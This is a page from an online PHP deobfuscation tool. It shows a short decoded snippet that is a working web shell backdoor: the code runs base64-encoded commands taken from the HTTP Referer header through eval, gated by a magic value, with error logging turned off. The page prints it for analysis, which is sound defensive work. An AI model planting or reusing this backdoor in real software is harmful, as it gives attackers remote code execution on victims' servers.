Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set('error_log', '/dev/null'); parse_str($_SERVER['HTTP_REFERER'], $a); if (r..
Decoded Output download
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
echo '<3456>';
eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
echo '</3456>';
?>
Did this file decode correctly?
Original Code
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
echo '<3456>';
eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
echo '</3456>';
Function Calls
| None |
Stats
| MD5 | fadc6c41e4b50a4bd86f67bb8843727d |
| Eval Count | 0 |
| Decode Time | 127 ms |